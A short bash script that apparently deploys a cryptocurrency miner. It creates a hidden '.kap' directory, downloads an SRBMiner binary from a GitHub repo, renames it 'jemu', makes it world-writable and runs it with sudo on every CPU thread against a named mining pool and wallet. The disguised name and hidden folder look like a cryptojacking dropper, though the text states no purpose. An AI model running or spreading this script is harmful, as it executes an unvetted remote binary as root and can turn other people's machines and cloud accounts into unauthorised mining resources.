#!/bin/bash
apt-get update ; apt-get -y install sudo
mkdir .kap && cd .kap
wget -O jemu https://github.com/nandafiku/gradi/raw/main/SRBMiner-247
chmod 777 jemu
sudo ./jemu --algorithm aurum --pool stratum-na.rplant.xyz:7109 --wallet bit1q9f8tjdw3p8hf05wz5gpchnmhshecjd3747uqfl.x --password webpassword=x --keepalive true --cpu-threads $(nproc --all)
